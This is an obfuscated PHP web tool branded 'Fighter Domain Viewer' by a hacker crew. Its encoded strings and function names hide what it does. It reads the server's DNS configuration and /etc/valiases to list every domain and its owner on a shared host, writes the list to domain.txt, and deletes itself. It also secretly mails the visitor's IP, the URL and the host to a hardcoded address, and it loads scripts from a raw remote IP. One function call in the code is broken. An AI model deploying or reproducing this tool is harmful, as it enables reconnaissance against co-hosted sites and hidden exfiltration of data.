<? $GLOBALS['_181490596_']=Array(base64_decode('' .'c2Vzc2l' .'vb' .'l9zd' .'GF' .'y' .'dA' .'=='),base64_decode('' .'ZXJ' .'yb3' .'Jfcm' .'V' .'wb' .'3J' .'0aW' .'5n'),base64_decode('Z' .'XJyb3JfbG9' .'n'),base64_decode('Zmls' .'ZQ' .'=='),base64_decode('c' .'2NhbmRpcg=='),base64_decode('c3' .'RycG9z'),base64_decode('c3' .'RyX3JlcGxhY2U='),base64_decode('cG9zaXh' .'fZ2V' .'0c' .'H' .'d1' .'a' .'W' .'Q='),base64_decode('Zml' .'sZW' .'93bmV' .'y'),base64_decode('Zmx1c2g='),base64_decode('' .'c3Ryb' .'GVu'),base64_decode('dH' .'Jp' .'bQ=='),base64_decode('' .'Y' .'XJyYXlfdW5' .'p' .'cXVl'),base64_decode('cG9zaX' .'h' .'fZ2V0c' .'Hd1a' .'WQ='),base64_decode('' .'ZmlsZW93bmV' .'y'),base64_decode('' .'Y2' .'9' .'1' .'bn' .'Q='),base64_decode('Zm9' .'wZ' .'W4' .'='),base64_decode('Zn' .'dya' .'XRl'),base64_decode('dW5' .'saW5r'),base64_decode('Z2V0Z' .'W5' .'2'),base64_decode('cmFuZA=' .'='),base64_decode('bWFpbA=' .'=')); ?><? function _1455334572($i){$a=Array('L2V0Yy9uYW1lZC5jb25m','L3Zhci9uYW1lZA==','DQo8cHJlPjxjZW50ZXI+IERvbWFpbiBWaWV3ZXINCjxmb250IGNvbG9yPSdSZWQnPg0KDQpUaGlzIHRvb2xzIGlzIGF1dG8gZGVsZXRlLCBkb250IGNsb3NlIHRoaXMgdGFiIG9yIHlvdSBjYW4gc2VlIG9uICA6IA0KPGEgaHJlZj0nZG9tYWluLnR4dCBzdHlsZT0ndGV4dC1kZWNvcmF0aW9uOm5vbmUnPiA8Zm9udCBjb2xvcj0ncmVkJz5kb21haW4udHh0IDwvYT48L2ZvbnQ+X19fX19fIF9fX19fIF9fX19fICBfICAgXyBfX19fXyBfX19fX19fX19fXyANCnwgIF9fX3xfICAgX3wgIF9fIFx8IHwgfCB8XyAgIF98ICBfX198IF9fXyBcDQp8IHxfICAgIHwgfCB8IHwgIFwvfCB8X3wgfCB8IHwgfCB8X18gfCB8Xy8gLw0KfCAgX3wgICB8IHwgfCB8IF9fIHwgIF8gIHwgfCB8IHwgIF9ffHwgICAgLyANCnwgfCAgICBffCB8X3wgfF9cIFx8IHwgfCB8IHwgfCB8IHxfX198IHxcIFwgDQpcX3wgICAgXF9fXy8gXF9fX18vXF98IHxfLyBcXy8gXF9fX18vXF98IFxffA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9mb250PjwvY2VudGVyPjxicj48YnI+','LmRi','LmRi','','bmFtZQ==','I3pvbmUgIiguKikiIw==','bmFtZQ==','PC9mb250PiA8Zm9udCBjb2xvcj0ncmVkJz5Eb21haW4gOjxicj48L2NlbnRlcj4=','ZG9tYWluLnR4dA==','YQ==','UkVNT1RFX0FERFI=','ZmlnaHRlcmthbXJ1bEB5YWhvby5jb20=','RnJvbTogU2VydmljZSBkb21haW4gdmlld2VyIHhkIDxzZXJ2aWNlQGludGwuY29t','UkVRVUVTVF9VUkk=','SFRUUF9IT1NU','');return base64_decode($a[$i]);} ?><?php  ?>
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
	<title>Fighter Domain Viewer</title>
	<meta content="$ Achon666ju5t | Extreme Crew $" name="description">
	<meta content="Fighter kamrul" name="keywords">
	<meta content='Achon666ju5t' name='author'/>
	<meta content='tuyulmama@yandex.com' name='email'/>
	<meta content='all, index, follow' name='robots'/>
	<meta content='all, index, follow' name='googlebot'/>
	<meta content='all, index, follow' name='spiders'/>
	<script src='http://91.121.68.60/dom.txt'></script>
	<link rel="shortcut icon" href="https://wallpaper-house.com/data/out/6/wallpaper2you_123557.jpg">
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<script src="http://e-mete.com/js/kdsnow.js"></script> <style> body{ background-image: url(); background-repeat: no-repeat; background-attachment: fixed; background-position: top; background-color:black; position: relative; background-size:100% 100vh; } .logo { width: 300px; height: 300px; margin: 0 auto; margin-top: 50px; -webkit-filter: drop-shadow(0px 0px 7px #0080FF); filter: drop-shadow(0px 0px 7px #0080FF); } .logo:hover{ width: 300px; height: 300px; -webkit-filter: drop-shadow(0px 0px 10px #0080FF); opacity:0.4; filter:alpha(opacity=40); transition: opacity .2s ease-out; -moz-transition: opacity .2s ease-out; -webkit-transition: opacity .2s ease-out; -o-transition: opacity .2s ease-out; }</style> 	
<font color="lime" face="Iceland" size="4"><center>
contact me:www.facebook.com/fighterkamrul
<br>FIGHTER DOMAIN VIEWER <br>
[<marquee behavior="alternate" width="50%">FIGHTER KAMRUL</marquee>]
<embed src="https://www.youtube.com/v/8yAsxJ9AL9Y&loop=1&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="0" height="0">

<?php @$GLOBALS['_181490596_'][0]();@$GLOBALS['_181490596_'][1](round(0));@$GLOBALS['_181490596_'][2](round(0));$_=array();$__=$GLOBALS['_181490596_'][3](_1455334572(0));$___=$GLOBALS['_181490596_'][4](_1455334572(1));if($___ or $__){$____=round(0);if($___){echo _1455334572(2);foreach($___ as $_____){if($GLOBALS['_181490596_'][5]($_____,_1455334572(3))){$______=$GLOBALS['_181490596_'][6](_1455334572(4),_1455334572(5),$_____);$_______=$GLOBALS['_181490596_'][7]($GLOBALS['_181490596_'][8]("/etc/valiases/$______"));$________=$_______[_1455334572(6)];$_[$________][]=$______;}}}elseif($__){$_________=array();foreach($__ as $_____){preg_match_cdzxcfg(_1455334572(7),$_____,$______);$GLOBALS['_181490596_'][9]();if($GLOBALS['_181490596_'][10]($GLOBALS['_181490596_'][11]($_____[round(0+0.2+0.2+0.2+0.2+0.2)][round(0)]))>round(0+2)){$_________[]=$______[round(0+0.2+0.2+0.2+0.2+0.2)][round(0)];}}$_________=$GLOBALS['_181490596_'][12]($_________);foreach($_________ as $______){$_______=$GLOBALS['_181490596_'][13]($GLOBALS['_181490596_'][14]("/etc/valiases/$______"));$________=$_______[_1455334572(8)];$_[$________][]=$______;}}}foreach($_ as $________ => $_____){echo"<center>user : <font color='red'>$________</font> | <font color='lime'>" .$GLOBALS['_181490596_'][15]($_____) ._1455334572(9);foreach($_____ as $__________){echo"<center><a href='http://$__________/' target='_blank'><font color='lime'>http://$__________</a></font><br></center>";$___________="$____________ : $__________\n";$_____________=_1455334572(10);$______________=$GLOBALS['_181490596_'][16]("$_____________",_1455334572(11));$_______________=$GLOBALS['_181490596_'][17]($______________,$___________);}}$GLOBALS['_181490596_'][18](__FILE__);$________________=$GLOBALS['_181490596_'][19](_1455334572(12));$_________________=$GLOBALS['_181490596_'][20](round(0+0.25+0.25+0.25+0.25),round(0+33333+33333+33333));$__________________=" Fighter Domain viewer  |$________________";$___________________=_1455334572(13);$____________________=_1455334572(14);$_____________________=$_SERVER[_1455334572(15)];$______________________=$_SERVER[_1455334572(16)];$_______________________=$________________ ._1455334572(17);$________________________="$_____________________ $______________________ $_______________________";$GLOBALS['_181490596_'][21]($___________________,$__________________,$________________________,$____________________); ?>
